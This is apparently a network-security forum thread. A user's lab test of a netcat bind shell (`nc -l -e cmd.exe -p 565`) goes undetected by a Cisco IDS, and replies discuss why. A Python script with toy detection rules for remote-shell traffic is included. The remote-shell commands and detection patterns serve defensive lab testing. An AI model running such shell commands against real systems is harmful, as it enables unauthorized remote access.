09-13-2007 12:22 PM - edited 03-10-2019 03:47 AM
I am doing the following lab testing:
nc -v -l -e cmd.exe -p 565
Attacker:
nc -v .x.x.x.x 565
I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?
Any help is highly appreciated.
09-13-2007 12:23 PM
***
nc -v -l -e cmd.exe -p 565
Attacker:
nc -v .x.x.x.x 565
09-14-2007 09:29 AM
You are using netcat to set up a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client; it redirects STDIN and STDOUT to the client.
To trigger your signature, set up the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.
09-14-2007 09:59 AM
Got it! But, as a matter of fact, my doubt was:
Can IDS sensors detect netcat activity on the network? Does netcat operate within the RFC TCP standards, and is it therefore seen as normal traffic?
09-14-2007 10:05 AM
Not reliably, AFAIK. It's not like telnet or ftp, which tend to use specific ports or have application RFCs. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.
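The two replies above make two points a detection engineer can check directly: with "-e cmd.exe" on the listener, the command name never crosses the wire (only the shell's STDIN and STDOUT do), so a payload rule on the literal string has nothing to match, and unusual-port anomaly detection is the other available handle. The following Python script is an added example, not code from this thread or from any Cisco IDS product. It runs three toy rules over constructed TCP conversations: a naive literal "cmd.exe" rule, a rule on what cmd.exe itself emits once attached to a socket (its version banner or a drive-letter prompt), and a port-baseline check. All addresses, ports, payloads, the Windows banner text and the baseline port set are made up for the demonstration.

```python
"""Toy inspection of reassembled TCP conversations (constructed sample data).

Shows why a literal "cmd.exe" content rule misses a netcat "-e" shell and
what a sensor can match instead: the shell's own output, or an unexpected port.
"""
import re
from dataclasses import dataclass


@dataclass
class Flow:
    """One TCP conversation as a sensor would reassemble it (constructed)."""
    src: str
    dst: str
    dport: int
    to_server: bytes = b""   # bytes the connecting side sent
    to_client: bytes = b""   # bytes the listening side sent back


# Rule 1: a naive content rule on the literal program name, either direction.
LITERAL_RULE = re.compile(rb"cmd\.exe", re.IGNORECASE)

# Rule 2: what a Windows command shell writes to its STDOUT once it is
# attached to the socket: the version banner or a prompt such as "C:\>".
SHELL_RULE = re.compile(
    rb"Microsoft Windows \[Version [0-9.]+\]|[A-Z]:\\[^\r\n]*>", re.IGNORECASE
)

# Rule 3: ports the monitored host is expected to serve. A constructed
# baseline standing in for the "unusual port usage" anomaly check.
BASELINE_PORTS = {22, 80, 443}


def inspect(flow: Flow, baseline=BASELINE_PORTS) -> list:
    """Return the list of alert names the three rules raise for one flow."""
    alerts = []
    for direction, data in (("to_server", flow.to_server),
                            ("to_client", flow.to_client)):
        if LITERAL_RULE.search(data):
            alerts.append(f"literal-cmd.exe:{direction}")
        if SHELL_RULE.search(data):
            alerts.append(f"windows-shell-io:{direction}")
    if flow.dport not in baseline:
        alerts.append(f"unusual-port:{flow.dport}")
    return alerts


# Constructed shell output; the version string is made up for the sample.
WIN_BANNER = (b"Microsoft Windows [Version 5.2.3790]\r\n"
              b"(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\>")

# Lab case from the original post: listener runs "-e cmd.exe" on port 565.
# The literal "cmd.exe" is never transmitted; only the shell's I/O is.
LISTENER_WITH_E = Flow("10.0.0.9", "10.0.0.5", 565,
                       to_server=b"dir\r\n",
                       to_client=WIN_BANNER + b"dir\r\n Volume in drive C has no label.\r\n")

# Reversed case: the connecting side runs "-e cmd.exe", so the shell's
# banner travels client-to-server instead.
CLIENT_WITH_E = Flow("10.0.0.5", "10.0.0.9", 565,
                     to_server=WIN_BANNER,
                     to_client=b"dir\r\n")

# Ordinary web request on a baseline port: no rule should fire.
BENIGN_HTTP = Flow("10.0.0.5", "10.0.0.9", 80,
                   to_server=b"GET / HTTP/1.1\r\nHost: lab\r\n\r\n",
                   to_client=b"HTTP/1.1 200 OK\r\n\r\n<html></html>")


if __name__ == "__main__":
    for name, flow in (("listener -e", LISTENER_WITH_E),
                       ("client -e", CLIENT_WITH_E),
                       ("benign http", BENIGN_HTTP)):
        print(f"{name:12} -> {inspect(flow) or ['no alert']}")
```

Running it shows the literal rule silent on both netcat cases while the shell-output rule and the port check fire, and nothing firing on the HTTP flow. In practice the banner rule is the more robust of the two: the port check depends on a good baseline, and a shell bound to a port already in the baseline would slip past it.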
09-14-2007 10:31 AM
Thanks Matt! I'll try to update the sensor and play with that then.